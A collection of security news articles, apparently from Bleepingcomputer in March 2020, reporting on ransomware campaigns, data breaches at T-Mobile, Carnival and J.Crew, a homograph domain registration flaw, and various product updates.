They will then steal credentials to gain administrative privileges so that they can toggle off security solutions, and will start deploying backdoors for persistence, as well as coin miners and spammers to use them as part of large scale spam and illicit mining campaigns.

Only after going through all these stages and running their spam and mining operations for a few weeks, PARINACOTA will deploy the Dharma ransomware to encrypt the organizations' systems, after first deleting local backups.

Dharma ransom note

Dharma attack chain
DoppelPaymer ransomware is delivered within victims' networks by its human operators using previously stolen user credentials with high privileges and tools like Group Policy and PsExec.

The operators "often abuse service accounts, including accounts used to manage security products, that have domain admin privileges to run native commands, often stopping antivirus software and other security controls," Microsoft says.

"The presence of banking Trojans like Dridex on machines compromised by DoppelPaymer point to the possibility that Dridex (or other malware) is introduced during earlier attack stages through fake updaters, malicious documents in phishing email, or even by being delivered via the Emotet botnet."

Even though Dridex is most likely as part of the infiltration process, RDP brute force artifacts have also been observed by Microsoft while monitoring the actors activities and analyzing some of the impacted networks.

The operators will also often deploy their payloads on networks previously compromised by other attackers months before the systems get encrypted with DoppelPaymer.

"The success of attacks relies on whether campaign operators manage to gain control over domain accounts with elevated privileges after establishing initial access," Microsoft adds.

This is done via credential theft attacks powered by Mimikatz, LaZange, and other credential dumping tools, and via privilege escalation by gaining control of admin accounts.

DoppelPaymer ransom note

DoppelPaymer attack chain
As Microsoft notes, DoppelPaymer attacks will not encrypt all systems on compromised networks. Instead, the operators will deploy a ransomware payload on a limited subset and an even smaller set of the infected machines will have their files encrypted.

Additionally, "the attackers maintain persistence on machines that don’t have the ransomware and appear intent to use these machines to come back to networks that pay the ransom or do not perform a full incident response and recovery."

The DoppelPaymer operators have also launched a data leak site in February 2020 to be used to shame victims who don't pay the ransoms and publish files stolen from their computers before encryption.

This move is part of a new trend started by Maze Ransomware in November 2019 and later adopted by operators of other ransomware like Sodinokibi, Nemty Ransomware, and BitPyLock.

Defense measures against human-operated ransomware attacks
Microsoft advises security teams and admins at organizations that might be targeted in the future by this type of ransomware campaigns to take defensive measures designed to bock common attack techniques or at least dramatically reduce their effectiveness.

The Microsoft Defender Advanced Threat Protection (ATP) Research Team recommends implementing these mitigation measures against human-operated ransomware attacks:

• Harden internet-facing assets:
- Apply latest security updates
- Use threat and vulnerability management
- Perform regular audit remove privileged credentials

• Thoroughly investigate and remediate alerts:
- Prioritize and treat commodity malware infections as potential full compromise

• Include IT Pros in security discussions:
- Ensure collaboration among SecOps, SecAdmins, and IT admins to configure servers and other endpoints securely

• Build credential hygiene:
- Use MFA or NLA, and use strong, randomized, just-in-time local admin passwords
- Apply principle of least-privilege

• Monitor for adversarial activities:
- Hunt for brute force attempts
- Monitor for cleanup of Event logs
- Analyze logon events

• Harden infrastructure:
- Use Windows Defender Firewall
- Enable tamper protection
- Enable cloud-delivered protection
- Turn on attack surface reduction rules and AMSI for Office VBA


PwndLocker Ransomware Gets Pwned: Decryption Now Available
7.3.2020 
Bleepingcomputer  Ransomware

Emsisoft has discovered a way to decrypt files encrypted by the new PwndLocker Ransomware so that victims can recover their files without paying a ransom.

We were the first to report about a relatively new ransomware called PwndLocker that was encrypting organizations and cities around the world and then demanding ransoms ranging from $175,000 to over $660,000 depending on the size of the network.

PwndLocker Ransom Note
PwndLocker Ransom Note
Among these victims is Lasalle County, Illinois who was hit with a 50 bitcoin ransom ($442,000) and the City of Novi Sad, Serbia who had over 50TB of data encrypted.

Flaw found in ransomware
After analyzing the PwndLocker ransomware, Emsisoft's Fabian Wosar was able to spot a weakness in the malware that allows victims to recover their files without paying the ransom.

To receive help with the ransomware, Wosar told BleepingComputer that victims need to send him a copy of the ransomware executable that was used in the attack.

Unfortunately, after deploying the ransomware the attackers are deleting this executable.

Victims may be able to recover the executable using Shadow Explorer or file recovery tools. When searching for the executable, victims should look in the %Temp%, C:\User folders, and %Appdata% folders.

Once an executable is found, victims can contact Emsisoft to receive help.


Attackers Deliver Malware via Fake Website Certificate Errors
7.3.2020 
Bleepingcomputer  

Cybercriminals are distributing malware using fake security certificate update requests displayed on previously compromised websites, attempting to infect potential victims with backdoors and Trojans using a malicious installer.

The attackers bait their targets with a "NET::ERR_CERT_OUT_OF_DATE" error message presented within an iframe displayed over the site's actual contents and asking them to install a security certificate that to allow their connection to succeed.

Security certificates (also known as digital certificates or identity certificates) are issued by Certification Authorities (CAs) and used to encrypt the communication between a user's browser and a website's server.

When digital certificates are out of date and not renewed, web browsers display a notification letting the users know of the decrease in the security of their connection to the website.

Malware campaign active for at least two months
Security researchers at Kaspersky have found the earliest signs of this campaign to be dating from January 16, 2020, with various types of websites being compromised and used to deliver malware to victims, from auto part stores to the site of a zoo.

"The alarming notification consists of an iframe — with contents loaded from the third-party resource ldfidfa[.]pw — overlaid on top of the original page," the researchers found. "The URL bar still displays the legitimate address."

The code injected by the operators behind this campaign as a jquery.js script overlays the malicious iframe with the exact same size as the compromised webpage.

Fake digital certificate error
Image: Kaspersky
"The iframe content is loaded from the address https[:]//ldfidfa[.]pw//chrome.html," the researchers add. "As a result, instead of the original page, the user sees a seemingly genuine banner urgently prompting to install a certificate update."

If the targets fall for the attackers' tricks and click the "Install (Recommended)" button under the fake warning message, they will download a Certificate_Update_v02.2020.exe binary that will infect them with malware instead of solving the made-up security certificate error.

Kaspersky discovered while monitoring these attacks that the victims will get infected either with the Buerak Trojan downloader that will download and install more malware onto infected computers.

The Mokes backdoor was also spread as a malicious payload during early-January and used by the attackers to download additional malware, to steal the victims' user credentials, capture keystrokes, records ambient audio every 5 minutes, as well as take screenshots and intercept information entered in the web browser.

More details about this campaign and indicators of compromise (IOCs) including malware hashes and command-and-control server domain info are available at the end of Kaspersky's analysis.


T-Mobile Data Breach Exposes Customer's Personal, Financial Info
7.3.2020 
Bleepingcomputer  Incindent

T-Mobile has announced a data breach caused by an email vendor being hacked that exposed the personal and financial information for some of its customers.

In 'Notices of Data Breach' posted to their web site, T-Mobile states that their email vendor was hacked and an unauthorized person was able to gain access to T-Mobile employee's email accounts.

Some of the email accounts that were hacked contained T-Mobile customer information such as social security numbers, financial information, government ID numbers, billing information, and rate plans.

To alert customers of the data breach, yesterday T-Mobile began texting customers affected by the data breach. These texts state that T-Mobile "recently identified and shut down a security event involving some of your account information" and contain a link to a page containing more information.

T-Mobile Data Breach Notification Text
T-Mobile Data Breach Notification Text
Source: Reddit
These text messages contain a link to one of the two "Notice of Data Breach" pages on T-Mobile's site depending on what data was exposed.

For users who had their financial information exposed, they will be directed to https://www.t-mobile.com/responsibility/consumer-info/pii-notice.

"The personal information accessed could include names and addresses, Social Security numbers, financial account information, and government identification numbers, as well as phone numbers, billing and account information, and rate plans and features."

For those who did not have their financial information impacted, they will be directed to https://www.t-mobile.com/responsibility/consumer-info/cpni-notice.

"The information accessed may have included customer names and addresses, phone numbers, account numbers, rate plans and features, and billing information. Your financial information (including credit card information) and Social Security number were not impacted."

Please note, the bolded text above was done by BleepingComputer to illustrate the difference between the two notices.

For customers whose financial information was exposed, T-Mobile is offering a free two-year subscription to the myTrueIdentity online credit monitoring service.

For customers who did not have financial information exposed, T-Mobile is not offering anything.

While the data breach notifications do not indicate that passwords were accessed, I strongly suggest you change your password at t-mobile.com. If your original password is also used at other sites, you should change them there as well to a unique password.

All customers impacted by this data breach should be on the lookout for targeted phishing scams. These phishing scams could pretend to be from T-Mobile or use the accessed information to gain your information at other companies.

It is not known how many T-Mobile customers were affected or when the breach occurred.

BleepingComputer has contacted T-Mobile for more information but has not heard back as of yet.

Prior T-Mobile data breaches
In 2018, T-Mobile customers were affected by a data breach after an unauthorized user hacked into the T-Mobile systems.

During this attack, the attacker was able to gain access to customer names, billing ZIP codes, phone numbers, email addresses, account numbers, and account types (prepaid or postpaid).

T-Mobile suffered another data breach last year that affected its pre-paid customers.

As part of that breach, an attacker gained access to the name and billing address (if provided when establishing an account), phone number, account number, and rate plan and features of pre-paid customers.


YouTube Web Site Subscriptions are Broken, Videos Not Displayed [Fixed]
7.3.2020 
Bleepingcomputer  Vulnerebility

A bug on the YouTube web site is telling users that the channels that they have subscribed to have not uploaded any videos yet. On mobile, though, everything is working fine.

When going into the 'Subscriptions' section of the YouTube web site, you would normally see the latest videos from channels you subscribe to.

Over the past few hours, though, users are reporting [1, 2, 3 ] and BleepingComputer has confirmed that the site is instead showing an error message stating "Your subscriptions haven't uploaded any videos yet. Try finding another channel to subscribe to."

YouTube Subscription Error
YouTube Subscription Error
As you can see from the above error, I was affected by this bug when using the site in Firefox as well as Chrome.

This error, though, is not happening on the Mobile YouTube app and everything is working correctly.

Unfortunately, generic fixes like logging out and back in, switching browsers, or trying incognito mode to make sure it's not an extension causing an issue has not fixed the problem.

There are no issues reported by YouTube on their Twitter account, but DownDetector has seen a huge surge in YouTube problem reports over the past few hours as can be seen by the graph below.

DownDetector YouTube Stats
DownDetector YouTube Stats
BleepingComputer has reached out to Google for questions about this issue but has not heard back as of yet.

Update 3/4/2020 10:15 PM EST: The issue has been fixed. No information as to what caused the problem.


Ryuk Ransomware Attacked Epiq Global Via TrickBot Infection
7.3.2020 
Bleepingcomputer  Ransomware

Legal services and e-discovery giant Epiq Global took their systems offline on Saturday after the Ryuk Ransomware was deployed and began encrypting devices on their network.

On March 2nd, legal reporter Bob Ambrogi broke the news that Epiq had globally taken their systems offline after detecting a cyberattack.

This outage affected their e-Discovery platforms, which made it impossible for legal clients to access documents needed for court cases and client deadlines.

Epiq later stated that they were affected by a ransomware attack and took their systems offline to contain the threat.

"On February 29, we detected unauthorized activity on our systems, which has been confirmed as a ransomware attack. As part of our comprehensive response plan, we immediately took our systems offline globally to contain the threat and began working with a third-party forensic firm to conduct an independent investigation.

Our technical team is working closely with world class third-party experts to address this matter, and bring our systems back online in a secure manner, as quickly as possible.

Federal law enforcement authorities have also been informed and are involved in the investigation.

As always, protecting client and employee information is a critical priority for the company. At this time there is no evidence of any unauthorized transfer or misuse or exfiltration of any data in our possession."

Later that night, TechCrunch reported that they were told that the attack affected all of Epiq's 80 global offices and their computers.

Epiq Global's attack started with a TrickBot infection
Today a source in the cybersecurity industry exclusively shared information with BleepingComputer that sheds light on how Epiq Global became infected.

In December 2019, a computer on Epiq's network became infected with the TrickBot malware.

TrickBot is most commonly installed by the Emotet Trojan, which is spread through phishing emails.

Once TrickBot is installed, it will harvest various data, including passwords, files, and cookies, from a compromised computer and will then try spread laterally throughout a network to gather more data.

When done harvesting data on a network, TrickBot will open a reverse shell to the Ryuk operators.

The Ryuk Actors will then have access to the infected computer and begin to perform reconnaissance of the network. After gaining administrator credentials, they will deploy the ransomware on the network's devices using PowerShell Empire or PSExec.

In Epiq Global's case, Ryuk was deployed on their network on Saturday morning, February 29th, 2020, when the ransomware began encrypting files on infected computers.

Ransom Note Created
Ransom Note Created
When encrypting files, the ransomware will create a ransom note named RyukReadMe.html in every folder. All files that were encrypted would also have the .RYK extension appended to them.

Epiq Global's Ryuk Ransom Note
Epiq Global's Ryuk Ransom Note
While Ryuk is considered a secure ransomware without any weaknesses in its encryption, Emsisoft's Brett Callow has told BleepingComputer that there may be a slight chance they can help recover files encrypted by the Ryuk ransomware.

“Companies affected by Ryuk should contact us. There is a small - very small - chance that we may be able to help them recover their data without needing to pay the ransom,” Callow told BleepingComputer.com.

While the chances are very small, if your devices are encrypted by the Ryuk Ransomware it does not hurt to check with Emsisoft.

BleepingComputer has reached out to Epiq with further questions about this attack, but have not heard back at this time.


Carnival Cruise Line Operator Discloses Potential Data Breach
7.3.2020 
Bleepingcomputer  Incindent

The world's largest cruise ship operator Carnival Corporation & plc announced a potential data breach affecting some of its customers after hackers accessed employee email accounts.

Carnival Corporation is included in both the S&P 500 and the FTSE 100 indices, and it owns nine cruise line brands and a travel tour company.

According to the company's corporate website, "Carnival Corporation employs over 120,000 people worldwide and its 10 cruise line brands attract nearly 11.5 million guests annually, which is about 50 percent of the global cruise market."

"Combining more than 225,000 daily cruise guests and 100,000 shipboard employees, more than 325,000 people are sailing aboard the Carnival Corporation fleet every single day, totaling about 85 million passenger cruise days a year."

Network intrusion leading to email compromise
"In late May 2019, we identified suspicious activity on our network," a notification letter sent to Carnival Corporation customers and filed with the Office of the California Attorney General says.

"Upon identifying this potential security issue, we engaged cybersecurity forensic experts and initiated an investigation to determine what happened, what data was affected, and who was impacted.

"It now appears that between April 11 and July 23, 2019, an unsanctioned third party gained unauthorized access to some employee email accounts that contained personal information regarding our guests."

We take privacy and security of personal information very seriously, and we are offering affected individuals free credit monitoring and identity theft detection services through ID Experts to provide you with MyIDCare. - Carnival Corporation

Carnival Corporation adds that, depending on the guest, the hackers might have accessed to "customers' names, addresses, Social Security numbers, government identification numbers, such as passport number or driver’s license number, credit card and financial account information, and health-related information."

The letter also says that there currently is no evidence that the impacted customers' personal info was misused after the security incident.

Besides the ongoing investigation regarding this security breach, Carnival Corporation says that it also reported the incident to the relevant law enforcement agencies.

Carnival Corporation's Data Protection Officer Jennifer Garone added that customers who have further questions about the incident can reach out to the company at +1 (833) 719-0091 (U.S. toll-free).


J.Crew Disables User Accounts After Credential Stuffing Attack
7.3.2020 
Bleepingcomputer  Attack

US clothing retailer J.Crew announced that it was the victim of a credential stuffing attack around April 2019 that led to some of its customers' accounts and information being accessed by hackers.

Credentials stuffing is a type of attack where hackers use large collections of username/password combinations bought from underground markets and leaked after previous security breaches and use them to gain access to user accounts on other online platforms.

The rate of success of such attacks is highly dependent on the common practice of users using the same email and password for multiple online accounts.

Their end goal is to log into as many accounts as possible onto the targeted site and take over the identities of the account owners, steal money, or gather information.

Accounts disabled after almost one year
J.Crew Group is a retailer of apparel, shoes, and accessories that operates 182 J.Crew retail stores, 140 Madewell stores, 170 factory stores, and the jcrew.com, jcrewfactory.com, and madewell.com sites as of March 2, 2020.

In a notice of data breach sent to affected customers, J.Crew says that it discovered "through routine and proactive web scanning" that an unauthorized party was able to log in to their jcrew.com accounts using their email addresses and passwords "in or around April 2019."

"The information that would have been accessible in your jcrew.com account includes the last four digits of credit card numbers you have stored in your account, the expiration dates, card types, and billing addresses connected to those cards, and order numbers, shipping confirmation numbers, and shipment status of those orders," J.Crew's data breach notification explains.

"We do not have reason to believe that the unauthorized party gained access to any additional information within your account."

J. Crew notice of data breach

Customers asked to reset their passwords
Following this incident, J.Crew has disabled the accounts of all impacted customers and asks them to reach out to the J. Crew Customer Care Center at privacy@jcrew.com or 800-205-7956 to reset their passwords.

"You should change your password on any other account where you use the same password discovered in this incident," J.Crew also advises affected customers.

Dunkin' Donuts was the victim of a similar attack a year ago. The company issued a security notification at the time notifying users of their DD Perks reward program that their accounts may have been compromised as part of a credential stuffing attack.

The attackers might have been able to access the account holders' first and last names, their email address, and the 16-digit DD Perks account number and QR code.

Walgreens, the second-largest drugstore chain in the US, also disclosed over the weekend that some of its mobile apps' users were able to accidentally access other users' personal info because of a bug including first and last name, prescription numbers and drug names, store numbers, and shipping addresses where applicable.

The company added that "no financial information such as Social Security number or bank account information was involved in this incident."


Microsoft Releases PowerShell 7.0 With New Features, Update Alerts
7.3.2020 
Bleepingcomputer   OS

Microsoft released PowerShell 7.0, the latest version of its cross-platform automation and configuration tool with new features including automatic new version notifications, bug fixes, and improvements.

PowerShell comes with support for all major operating systems including Windows, Linux, and macOS, and it allows working with structured data like JSON, CSV, and XML, as well as REST APIs and object models.

It provides users with a command-line shell, a framework for processing PowerShell cmdlets, and an associated scripting language focused on automation.

PowerShell 7.0
PowerShell 7.0
New PowerShell features
PowerShell 7.0 introduces multiple new features including but not limited to:

• Pipeline parallelization with ForEach-Object -Parallel
• A simplified and dynamic error view and Get-Error cmdlet for easier investigation of errors
• A compatibility layer that enables users to import modules in an implicit Windows PowerShell session
• Automatic new version notifications
• The ability to invoke to invoke DSC resources directly from PowerShell 7 (experimental)
• New operators:
- Ternary operator: a ? b : c
- Pipeline chain operators: || and &&
- Null coalescing operators: ?? and ??=

"The shift from PowerShell Core 6.x to 7.0 also marks our move from .NET Core 2.x to 3.1. .NET Core 3.1 brings back a host of .NET Framework APIs (especially on Windows), enabling significantly more backwards compatibility with existing Windows PowerShell modules," Microsoft PowerShell Product Manager Joey Aiello‏ says.

"This includes many modules on Windows that require GUI functionality like Out-GridView and Show-Command, as well as many role management modules that ship as part of Windows."

PowerShell 7.0 fixes and improvements
General Cmdlet updates and fixes:

• Enable Ctrl+C to work for global tool (#11959)
• Fix ConciseView to not show the line information within the error messages (#11952)

Build and packaging improvements:

• Publish PowerShell into the Windows engineering system package format (#11960)
• Bump .NET core framework to 3.1.2 (#11963)
• Ensure the man page gzip has the correct name for LTS release (#11956)
• Bump Microsoft.ApplicationInsights from 2.13.0 to 2.13.1 (#11925)

Install PowerShell 7.0
Microsoft provides installation docs for Windows, macOS, Linux, and ARM users with information on the multiple installation methods available based on the users' OS and their preferred package format.

You can download a PowerShell installer package for one of the following platforms:

Supported Platform Download How to Install
Windows (x64) .msi Instructions
Windows (x86) .msi Instructions
Ubuntu 18.04 .deb Instructions
Ubuntu 16.04 .deb Instructions
Debian 9 .deb Instructions
Debian 10 .deb
CentOS 7 .rpm Instructions
CentOS 8 .rpm
Red Hat Enterprise Linux 7 .rpm Instructions
openSUSE 42.3 .rpm Instructions
Fedora 30 .rpm Instructions
macOS 10.13+ .pkg Instructions
Docker Instructions
More information on the full list of platforms and Microsoft products come with support this new release is available in Microsoft's PowerShell 7.0 announcement.


Microsoft, Google Offer Free Remote Work Tools Due to Coronavirus
7.3.2020 
Bleepingcomputer  Security
With employees either being quarantined after international travel or encouraged to work remotely due to the Coronavirus (COVID–19), Microsoft, Google, LogMeIn, and Cisco are offering free licenses to their meeting, collaboration, and remote work tools.

Using these products, remote workers will be able to perform virtual meetings and chat with other employees while working remotely from their homes.

Microsoft Teams free for six months
A tweet by JP Courtois, Microsoft EVP and President, Microsoft Global Sales, Marketing & Operations, stated that Microsoft Teams is now available for free for six months to "support public health and safety by making remote work even easier."

Microsoft Tweet

Google offers free access to Hangouts Meet for G Suite users
Google announced this week that they are offering G Suite and G Suite for Education customers free access to their Hangouts Meet video-conferencing features.

This includes the following features:

Larger meetings, for up to 250 participants per call
Live streaming for up to 100,000 viewers within a domain
The ability to record meetings and save them to Google Drive
"These features are typically available in the Enterprise edition of G Suite and in G Suite Enterprise for Education, and will be available at no additional cost to all customers until July 1, 2020," Google stated in their announcement.

LogMeIn offers free Emergency Remote Work Kits
LogMeIn is offering a free Emergency Remote Work Kit that includes free 3-month site-wide licenses to GoToMeeting so that remote workers can join virtual meetings with other employees.

"Starting immediately, we will be offering our critical front-line service providers with free, organization-wide use of many LogMeIn products for 3 months through the availability of Emergency Remote Work Kits. These kits will include solutions for meetings and video conferencing, webinars and virtual events, IT support and management of remote employee devices and apps, as well as remote access to devices in multiple locations. For example, the “Meet” Emergency Remote Work Kit will provide eligible organizations with a free site-wide license of GoToMeeting for 3 months," LogMeIn CEO Bill Wagnar said in a blog post.

Cisco offers free enhanced Webex licenses
As we previously reported, Cisco has enhanced its free Webex license to now support meetings with an unlimited amount of time and up to 100 participants.

Cisco is also offering free 90-day licenses to businesses that are not currently Webex customers.

"Additionally, through our partners and the Cisco sales team, we are providing free 90-day licenses to businesses who are not Webex customers in this time of need. We’re also helping existing customers meet their rapidly changing needs as they enable a much larger number of remote workers by expanding their usage at no additional cost," Cisco announced.


Windows Explorer Used by Mailto Ransomware to Evade Detection
7.3.2020 
Bleepingcomputer  Ransomware

A newly discovered Mailto (NetWalker) ransomware strain can inject malicious code into the Windows Explorer process so that the malware can evade detection.

While this ransomware first spotted in August 2019 is known as Mailto based on the extension it appends to all encrypted files, according to the analysis of one of its decryptors the ransomware's authors dubbed it NetWalker.

Following an attack disclosed in early-February, Mailto is not only targeting home users but it also attempts compromising enterprise networks and encrypting all of the Windows devices connected to it.

Windows Explorer used to hide in plain sight
While there are a lot of malware families that use process hollowing to create a process in a suspended state and then unmap and replace its memory with malicious code, the operators behind the Mailto ransomware use a different method of achieving the same result as Quick Heal found.

Instead of creating the 'scapegoat' process in suspended mode, Mailto ransomware will create it in Debug mode and use debug APIs such as WaitForDebugEvent to perform the actual malicious code injection and have the explorer.exe process execute it.

Creating the explorer.exe process in debug mode
Image: Quick Heal
After successfully injecting the malicious payload, the malware gains persistence on the compromised device by adding a registry RUN entry and deletes system shadow copies to prevent the victims from restoring their data after encryption.

The ransomware stores its configuration data including the "base64 encrypted ransom note, e-mail addresses used in the ransom note, processes that need to be killed if in execution, whitelisted paths, file names and extensions," and everything else it needs within the .rsrc section of the JSON payload it injects within the explorer.exe.

Payload injected into explorer.exe
Payload injected into explorer.exe
"The ransomware and its group have one of the more granular and more sophisticated configurations observed," Head of SentinelLabs Vitali Kremez told BleepingComputer after analyzing a Mailto ransomware sample last month.

When encrypting victims' files, the Mailto ransomware will append an extension using the format .mailto[{mail1}].{id}. For instance, a file named 1.doc will be first encrypted and then renamed to 1.doc.mailto[sevenoneone@cock.li].77d8b.

Mailto also drops ransom notes containing info on what happened to the infected computer, as well as two email addresses the victim use to get the payment amount and decryption instructions.

Mailto encrypted documents
Mailto encrypted documents
Clears all traces after encrypting files
"After encryption, the ‘explorer.exe’ kills the parent process and deletes the original sample, the file dropped at %ProgramFiles% and also the RUN entry, eradicating the traces of its existence," Quick Heal also discovered.

Mailto ransomware is still being analyzed and it is not yet known if there are any weaknesses in its encryption algorithm that could be used to decrypt locked files for free.

Those who had their files encrypted by Mailto (NetWalker) can find more information about this ransomware and receive support in our dedicated Mailto / Netwalker Ransomware Support & Help Topic.

In related news, Australian transportation and logistics company Toll Group disclosed that systems across business units and multiple sites were encrypted by the Mailto ransomware in February.

Also, Mailto is not the first ransomware spotted while using novel ways to fight against security solutions. A Snatch ransomware strain reboots victims' computers into Safe Mode to disable any resident antimalware solutions and immediately starts encrypting their files once the system restarts.


Microsoft Reveals a New Design for the Windows 10 Start Menu
7.3.2020 
Bleepingcomputer  OS

Microsoft has unveiled its vision of a new Windows 10 Start Menu that utilizes a transparent background to showcase the new Fluent-based colorful icons.

In the latest "#WindowsInsider Webcast", Microsoft shared slides illustrating the changes they are exploring to the Windows 10 Start Menu.

These changes include the new Windows 10 Fluent-based system icons that have begun to roll out to Windows users and a transparent background for the Start Menu program tiles to help the icons stand out.

Currently, the Windows 10 Start Menu tiles include icons with a colored background as shown below in the dark and light themes.

Current Windows 10 Start Menu Tiles
Current Windows 10 Start Menu Tiles
With the new vision of the Start Menu, Microsoft is exploring the idea of using a transparent background and the new Fluent-based icons to "visually unify the start menu from somewhat chaotic color to something that is more uniform."

New Vision of the Windows 10 Start Menu
New Vision of the Windows 10 Start Menu
It has also been widely reported this week that the Windows 10 Live Tiles are being removed from the Start Menu.

During the webcast, Senior Program Manager for the Windows Insider Team Brandon Leblanc stated that this is not true.

"Live tiles aren't going anywhere right now. It's about blending the new icons better with how they look on Start today. That's what we're discussing now," Brandon Leblanc stated.

For those who use Live Tiles, you will be able to continue doing so in the future.


Zero-Day Bug Allowed Attackers to Register Malicious Domains
7.3.2020 
Bleepingcomputer  Attack

A zero-day vulnerability impacting Verisign and several SaaS services including Google, Amazon, and DigitalOcean allowed potential attackers to register .com and .net homograph domain names (among others) that could be used in insider, phishing, and social-engineering attacks against organizations.

Before this was disclosed by Soluble security researcher Matt Hamilton in collaboration with security testing firm Bishop Fox to Verisign and SaaS services, anyone could register homograph domain names on gTLDs (.com, .net, and more) and subdomains within some SaaS companies using homoglyph characters.

"Some of these vendors were responsive and engaged in productive dialog, though others have not responded or did not want to fix the issue," Hamilton says.

At this time, only Verisign and Amazon (S3) have remediated this issue, with Verisign deploying changes to gTLD registration rules to block the registration of domains using these homoglyphs.

The issue was discovered by Hamilton after attempting to register domains using Latin homoglyph characters (i.e., Unicode Latin IPA Extension homoglyphs).

IPA homoglyphs

Homograph domains commonly used for malicious purposes
Abusing this domain registration issue can lead to attacks very similar to IDN homograph attacks, presenting the same range of risks.

Homograph attacks are happening when threat actors register new domains that look very similar and sometimes look identical to those of known organizations and companies and assign them valid certificates.

They are usually used as part of scam campaigns that rely on these lookalike domains to redirect potential victims to sites delivering malware or attempting to steal their credentials.

While homograph attacks are nothing new and web browsers will expose them by replacing the Unicode characters with Punycode in the address bar, and Verisign and similar providers have rules in place that block the registration of homograph domains, the Unicode Latin IPA Extension character set wasn't blocked until Hamilton's disclosure.

Below you can find the Latin characters and some of the Unicode Latin IPA Extension homoglyph counterparts attackers could have used to register lookalike homograph domains.

• The “ɡ” (Voiced Velar Stop) is the most convincing character—near indistinguishable from its Latin counterpart.
• The “ɑ” (Latin Alpha) is also very convincing, particularly when not adjacent to a Latin “a”.
• The “ɩ” (Latin Iota) is the least convincing of the group. On some systems and fonts this character appears very similar to a lowercase “L”, but it’s more often the case that this character can be discerned from its Latin counterpart.
Attackers started abusing this flaw in 2017
After registering a homograph domain or subdomain that's indistinguishable from the domain of a high profile company, attackers can launch any number of attacks that take advantage of this, including but not limited to highly targeted phishing and social-engineering attacks against the employees, customers, or users of the organization who's domain is spoofed.

"Between 2017 and today, more than a dozen homograph domains have had active HTTPS certificates," Hamilton says. "This included prominent financial, internet shopping, technology, and other Fortune 100 sites."

He also found that "third-parties had registered and generated HTTS certificates for 15 of the 300 tested domains using this homoglyph technique."

"Additionally, one instance of a homoglyph domain hosting an unofficial and presumed malicious jQuery library was found.

"There is no legitimate or non-fraudulent justification for this activity (excluding the research I conducted for this responsible disclosure)," Hamilton added.

The homograph domain names registered by abusing this bug were most probably used as part of highly targeted social-engineering campaigns directed at employees of high-profile government and privately held organizations rather than common phishing campaigns targeting random victims.

As part of the research process, Hamilton also registered the following homograph domains using Unicode Latin IPA Extension homoglyph characters to show the impact they could have if used for malicious purposes (some of them have already been transferred to the owners of the non-homograph domains):

amɑzon.com
Chɑse.com
Sɑlesforce.com
ɡmɑil.com
ɑppɩe.com
ebɑy.com
ɡstatic.com
steɑmpowered.com
theɡuardian.com
theverɡe.com
Washinɡtonpost.com
pɑypɑɩ.com
wɑlmɑrt.com
wɑsɑbisys.com
yɑhoo.com
cɩoudfɩare.com
deɩɩ.com
gmɑiɩ.com
gooɡleapis.com
huffinɡtonpost.com
instaɡram.com
microsoftonɩine.com
ɑmɑzonɑws.com
ɑndroid.com
netfɩix.com

Fixed by Verisign
Verisign, the authoritative registry for the .com, .net, .edu, and several other generic top-level domains (gTLDs), has fixed the flaw and now restricts the registration of domains using these homoglyph characters, and it has also changed domain name registration rules by updating the table of allowed characters in newly registered domains.

"While the underlying issue described by Mr. Hamilton is well understood by the global Internet community – and is the subject of active policy development by ICANN – we appreciate him providing additional timely details about how this issue may be exploited," Verisign said in a statement.

"Although we understand that ICANN has been on a path to address these issues globally, we have also proactively updated our systems and obtained the necessary approval from ICANN to implement the changes to the .com and .net top-level domains required to prevent the specific types of confusable homograph registrations detailed in Mr. Hamilton’s report.

After disclosing the zero-day, a tool for generating domain permutations using these homoglyph characters and for checking Certificate Transparency logs was also created and is now available online.

More details and the full disclosure timeline can be found in Hamilton’s full report on this new type of homograph attack


Let's Encrypt to Revoke 3 Million TLS Certificates Due to Bug
7.3.2020 
Bleepingcomputer   Vulnerebility

Let's Encrypt will revoke over 3 million certificates on Wednesday, March 4th, due to a bug in their domain validation and issuance software.

A bug in Let's Encrypt's certificate authority (CA) software caused some certificates to not be properly validated through Certificate Authority Authorization (CAA) configured for an associated domain.

CAA is a security feature that allows domain administrators to create a DNS record that restricts the certificate authorities that are allowed to issue certificates for that particular domain.

As part of the rules for this feature, authorities must check CAA records at most 8 hours before a certificate is issued.

A bug in their CA software, called Boulder, caused a domain on a multi-domain certificate to be checked numerous times rather than all the domains on the certificate being checked once. This caused certificates to be issued without the proper CAA checks for some domains.

"The bug: when a certificate request contained N domain names that needed CAA rechecking, Boulder would pick one domain name and check it N times. What this means in practice is that if a subscriber validated a domain name at time X, and the CAA records for that domain at time X allowed Let’s Encrypt issuance, that subscriber would be able to issue a certificate containing that domain name until X+30 days, even if someone later installed CAA records on that domain name that prohibit issuance by Let’s Encrypt," Let's Encrypt's incident report explained.

Due to this, tomorrow Let's Encrypt will be revoking 3,048,289 currently-valid certificates, which is 2.6% of their overall ~116 million active certificates.

For those affected, Let's Encrypt has emailed users who must renew their certificates by tomorrow before they can become invalid.

Email sent to affected users
Email sent to affected users
Source: Twitter
To check if your domain is affected by this bug and needs to be renewed, you can use the tool at https://checkhost.unboundtest.com/.

Simply enter your domain name and the page will tell you if you are affected or not. Those who are affected will be shown a message similar to the one below:

"The certificate currently available on [hostname] needs renewal because it is affected by the Let's Encrypt CAA rechecking problem. Its serial number is [serial number]. See your ACME client documentation for instructions on how to renew a certificate."

With only 24 hours to renew their certificates, many users are scrambling to get them done and some are running into issues.

Let's Encrypt recommends users refer to this help document for more information and post in the 'Get Help forums' if needed.


Ransomware Attackers Use Your Cloud Backups Against You
7.3.2020 
Bleepingcomputer   Ransomware

Backups are one the most, if not the most, important defense against ransomware, but if not configured properly, attackers will use it against you.

Recently the DoppelPaymer Ransomware operators published on their leak site the Admin user name and password for a non-paying victim's Veeam backup software.

Leaked Veeam Account
Leaked Veeam Account
This was not meant to expose the information to others for further attacks but was used as a warning to the victim that the ransomware operators had full access to their network, including the backups.

After seeing this information, I reached out to the operators of the DoppelPaymer and Maze Ransomware families to learn how they target victim's backups and was surprised by what I learned.

It should be noted that in this article we will be focusing on the Veeam backup software. Not because it is less secure than other software, but simply because it is one of the most popular enterprise backup products and was mentioned by the ransomware operators.

Attackers first use your cloud backups to steal your data
During ransomware attacks, attackers will compromise an individual host through phishing, malware, or exposed remote desktop services.

Once they gain access to a machine, they spread laterally throughout the network until they gain access to administrator credentials and the domain controller.

Using tools such as Mimikatz they proceed to dump credentials from the active directory.

According to Nero Consulting, an MSP and IT Consulting company based out of New York City who assisted me with this article, this could allow the attackers to gain access to backup software as some administrators configure Veeam to use Windows authentication.

Log into Veeam using Windows authentication
